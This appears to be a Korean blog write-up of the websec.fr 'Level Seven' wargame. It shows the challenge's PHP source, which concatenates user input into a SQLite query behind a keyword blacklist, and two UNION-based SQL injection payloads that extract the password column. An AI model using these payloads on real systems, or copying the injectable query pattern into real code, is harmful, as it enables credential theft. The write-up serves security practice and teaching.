source.php
<!--
Greetz to bui for finding a neat bypass that is now fixed :)
Sorry Mantis for killing your attempts :D
-->
<?php
ini_set('display_errors', 'on');
ini_set('error_reporting', E_ALL);
function sanitize($str) {
/* Rock-solid ! */
$special1 = ["!", "\"", "#", "$", "%", "&", "'", "+", "-"];
$special2 = [".", "/", ":", ";", "<", "=", ">", "?", "@"];
$special3 = ["[", "]", "^", "_", "`", "\\", "|", "{", "}"];
$sql = ["or", "is", "like", "glob", "join", "0", "limit", "char"];
$blacklist = array_merge($special1, $special2, $special3, $sql);
foreach ($blacklist as $value) {
if (stripos ($str, $value) !== false)
die ("Presence of '" . $value . "' detected: abort, abort, abort!\n");
}
}
if (isset ($_POST['submit']) && isset ($_POST['user_id'])) {
$injection = $_POST['user_id'];
$pdo = new SQLite3 ('database.db', SQLITE3_OPEN_READONLY);
sanitize ($injection);
//$query = 'SELECT id,login,password FROM users WHERE id=' . $injection;
$query = 'SELECT id,login FROM users WHERE id=' . $injection;
$getUsers = $pdo->query ($query);
$users = $getUsers->fetchArray (SQLITE3_ASSOC);
$userDetails = false;
if ($users) {
$userDetails = $users;
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>#WebSec Level Seven</title>
<link rel="stylesheet" href="../static/bootstrap.min.css" />
</head>
<body>
<div id="main">
<div class="container">
<div class="row">
<h1>LevelSeven <small> - Select the user by ID you wish to view</small></h1>
</div>
<div class="row">
<p class="lead">
This application is used to view the username by the given user ID, it will return the corresponding username from the database.
To prevent sql injections, it uses a <em>super-efficient-blacklist-based</em> filter, check it <a href="./source.php">here</a>.<br>
Thanks to <a href="https://twitter.com/_cutz">cutz</a> for the idea.
</p>
</div>
</div>
<div class="container">
<?php if (isset ($userDetails) && !empty ($userDetails)): ?>
<div class="row">
<p class="well"><strong>Username for given ID</strong>: <?php echo $userDetails['login']; ?> </p>
<p class="well"><strong>Other User Details</strong>: <br />
<?php
$keys = array_keys ($userDetails);
$i = 0;
foreach ($userDetails as $user) {
echo $keys[$i++] . ' -> ' . $user . "<br>";
}
?>
</p>
</div>
<?php endif; ?>
<div class="row">
<label for="user_id">Enter the user ID:</label>
<form name="username" method="post">
<div class="form-group col-md-2">
<input type="text" class="form-control" id="user_id" name="user_id" value="1" required>
</div>
<div class="col-md-2">
<input type="submit" class="form-control btn btn-default" placeholder="Submit!" name="submit">
</div>
</form>
</div>
</div>
</div>
<script type="text/javascript" src="../static/bootstrap.min.js"></script>
</body>
</html>
id가 1번인 계정의 password 컬럼 값 뽑아오면 된다. as 필터때문에 password 컬럼명을 못쓰는 부분이랑 id조건 주는 부분만 우회해주면된다 . max랑 between 두가지 방법으로 우회가 가능하다.
payload
1)
999 union select id,login from (select 99 id,2,3 login union select * from users) a where id between 1 and 1
2)
999 union select max(id),login from (select 99,2 id,3 login union select * from users) a
'Wargame > websec.fr' 카테고리의 다른 글
| websec.fr hard level 14 (0) | 2019.08.23 |
|---|---|
| websec.fr medium level 31 (0) | 2019.08.23 |
| websec.fr medium level 18 (0) | 2019.08.23 |
| websec.fr medium level 09 (0) | 2019.08.23 |
| websec.fr medium level 05 (0) | 2019.08.23 |
JeonYoungSin
메모 기록용 공간